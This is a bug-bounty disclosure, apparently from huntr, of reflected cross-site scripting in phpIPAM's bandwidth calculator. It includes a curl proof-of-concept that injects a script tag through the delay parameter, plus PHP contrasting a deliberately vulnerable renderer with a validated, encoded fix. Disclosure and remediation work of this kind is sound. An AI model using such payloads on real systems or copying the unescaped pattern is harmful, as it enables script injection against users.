huntr / Z3n70 / B72D4F0C-8A96-4B40-A031-7D469C6AB93B
History: Nov 01, 2022 - 6:07 a.m.

Cross Site Scripting (XSS) Reflected

2022-11-01 06:07:53
z3n70
www.huntr.dev
32
cross site scripting
reflected
http request
response
burpsuite
payload
curl
bug bounty

EPSS

0.001

Percentile

30.7%

Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

1. I opened this page: localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. I analysed the code at lines 41-45 of https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. Next I used Burp Suite to intercept the request and changed the value of some parameters, such as wsize, delay and fsize (lines 13-15 of https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php), to the <script>alert(1)</script> payload
4. The reflected XSS payload <script>alert(1)</script> is triggered
//PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'
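The following PHP is an added illustration and is not phpipam's own code. It models a hypothetical result handler for the wsize, delay and fsize POST parameters named in the report: first the reflecting pattern the report describes, then a hardened version that validates each value as the number the calculator actually needs and HTML-encodes it on output. The HTML layout, function names and numeric ranges are assumptions made for the example.

```php
<?php
// Added illustration; not phpipam's own code. Models a hypothetical handler
// for the wsize, delay and fsize POST parameters named in the report.
// The HTML layout, function names and numeric ranges are assumptions.

// HTML-encode a string for insertion into element content or attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: raw POST values are interpolated into the markup, so
// delay=<script>alert(1)</script> comes back as live script in the response.
function render_result_vulnerable(array $post): string
{
    $wsize = $post['wsize'] ?? '';
    $delay = $post['delay'] ?? '';
    $fsize = $post['fsize'] ?? '';
    return "<tr><td>Window size</td><td>$wsize</td></tr>"
         . "<tr><td>Delay</td><td>$delay</td></tr>"
         . "<tr><td>File size</td><td>$fsize</td></tr>";
}

// Hardened step 1: the calculator only needs numbers, so validate each value
// as a number. filter_var() returns false for anything else, including a
// missing parameter, instead of passing an arbitrary string through.
function parse_params(array $post): ?array
{
    $positive = ['options' => ['min_range' => 1]];
    $wsize = filter_var($post['wsize'] ?? null, FILTER_VALIDATE_INT, $positive);
    $delay = filter_var($post['delay'] ?? null, FILTER_VALIDATE_FLOAT);
    $fsize = filter_var($post['fsize'] ?? null, FILTER_VALIDATE_INT, $positive);
    if ($wsize === false || $delay === false || $delay < 0 || $fsize === false) {
        return null;
    }
    return ['wsize' => $wsize, 'delay' => $delay, 'fsize' => $fsize];
}

// Hardened step 2: reject bad input with a 400, and still HTML-encode the
// values on output so the reflection cannot return if validation is relaxed.
function render_result_hardened(array $post): string
{
    $p = parse_params($post);
    if ($p === null) {
        http_response_code(400);
        return '<p>Invalid bandwidth calculator input.</p>';
    }
    return '<tr><td>Window size</td><td>' . h((string) $p['wsize']) . '</td></tr>'
         . '<tr><td>Delay</td><td>' . h((string) $p['delay']) . '</td></tr>'
         . '<tr><td>File size</td><td>' . h((string) $p['fsize']) . '</td></tr>';
}

if (PHP_SAPI === 'cli') {
    // Constructed input mirroring the POST body from the report's PoC.
    $poc  = ['wsize' => '50000', 'delay' => '<script>alert(1)</script>', 'fsize' => '1024'];
    $good = ['wsize' => '50000', 'delay' => '20', 'fsize' => '1024'];

    $vuln = render_result_vulnerable($poc);
    echo 'vulnerable reflects raw tag: ', var_export(strpos($vuln, '<script>') !== false, true), "\n";

    $hard = render_result_hardened($poc);
    echo 'hardened reflects raw tag:   ', var_export(strpos($hard, '<script>') !== false, true), "\n";

    echo "hardened with valid input:\n", render_result_hardened($good), "\n";
}
```

Running the file on the command line with php prints true for the vulnerable renderer and false for the hardened one, then the encoded table row for the valid input. After a fix of this shape is deployed, replaying the curl request from the PoC above is the regression check: the response must be a 400 or, at most, contain the encoded form `&lt;script&gt;`, never the raw tag.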

